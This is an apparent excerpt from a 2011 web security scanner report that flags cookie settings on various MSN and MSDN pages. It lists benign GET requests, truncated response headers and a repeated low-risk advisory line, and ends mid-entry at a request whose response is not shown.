HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:51 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 48741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies/blogs/videodrone-blog.aspx HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:53 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=95fdb1a67d8c452591b9b1d3553ca658; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1219E6217C35489A85953685DFCF99E9; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 56969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies/blogs/videodrone-blogpost.aspx HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:52 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA56 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=6d751073fa5b4121b2cd69496e39f021; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8104721B1DA441FBA6658BE28078FA49; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 22912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Forums/en-US/windowsphone7series/threads HTTP/1.1 Host: social.msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 Set-Cookie: .ASPXANONYMOUS=_HXAcN3ezAEkAAAANTFiOTVkNDAtNzBkMy00OTlmLWIwYjgtMDcxN2MxMTZkMWFmbxOZ7JYQP3dzD3-g9V1k7zpmuBI1; expires=Sun, 29-Jan-2012 23:26:34 GMT; path=/; HttpOnly Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/ X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB21 Date: Sat, 29 Jan 2011 23:26:34 GMT Content-Length: 62798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:50:58 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=85e00d6e6f6c4a778e4031e134497c88; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=63CE5261B6254DBF87870C0B65E15402; domain=.redacted; expires=Thu, 18-Aug-2011 01:50:58 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 24408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:21 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=47b7e33a132247bf8382137776d91eb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=6378AE381CF74C0AB0F61F11DCCB43D6; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:21 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17250
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:19 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a0e82ca105e74736bef180d33ad85b63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=3D7690447A274FA6A7A5188FFB75CF63; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:19 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17128
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Famous-February-birthdays.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=af42dcb823fb4382b27164e71b4553fa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=14EF63B027F946CD907C6E5D6601CA44; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:26 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:22 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=d363cc0566a641bbac227c396c72e6da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=B5C6E6CBBD8140B1A45E68CFF623563E; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:15 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=ce8cf853b593429c8c5ae3125646c35b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=14CA8A1489AA49D39C1600720CAD343B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:15 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=b8024ffbe31247238960e8dad42e6ae0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=54B802C72C5D4A968AE6BEB7BEB43885; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17086
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Billionaires-caucus.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:06 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA54 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=509e6c71b5ba480d910bf7b7e5f60afe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=0BDAD1C110174CA4BA5911AED9744835; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:59 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=115826fb361947fba7a59745eee1a2fe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=19D7523F04DB408783F64E4246E74057; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:59 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:10 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=686b26f612ef4ff886afcdf5b0daf95d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=64FF62872D864AAC8B7EAB35C97F487F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:10 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Egypt-new-vp.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:58 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA56 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=075506e27db2457ab39ca3349aad58aa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=751919D3B46045639E5A7F4BB4D9E241; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Famous-escapes.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:57 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=1609e5a58c494ff581dac6b56594c457; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=5969A2C4E44346D5AD9CAFB1687B8DC5; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17042
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Mom-kills-teens.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:12 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=adae2bda89bb456997895c86d0995bea; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=606B6FED01FA4B74AC05FBCA266D2456; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17048
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Nathan-Woods-dies.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:07 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=43c0ed9dcd59405e97e0ca56ecbc5934; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=E67F9D21403E45ABB6A08727A2CBE039; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:07 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665 HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:01 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 23610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852 HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:02 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 23189
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:14 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA52 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3dac27f13e6f43ddbdd099e1136b2ed6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=C971D4F5C5424720A741D6E2B244FC0D; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/TV/Reality-show-and-housewives.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:30 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=57c44e4f157449418f258835ff8a2157; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=697F387490984D5091A88C7D9264CF7B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /IEIncreaseFont_preview.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:54 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=0506a602688945e5ad28ee84c22b5f61; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=80780BE1B7C941D18D9BC03C02043CA7; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:54 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 13283
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alphabet.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
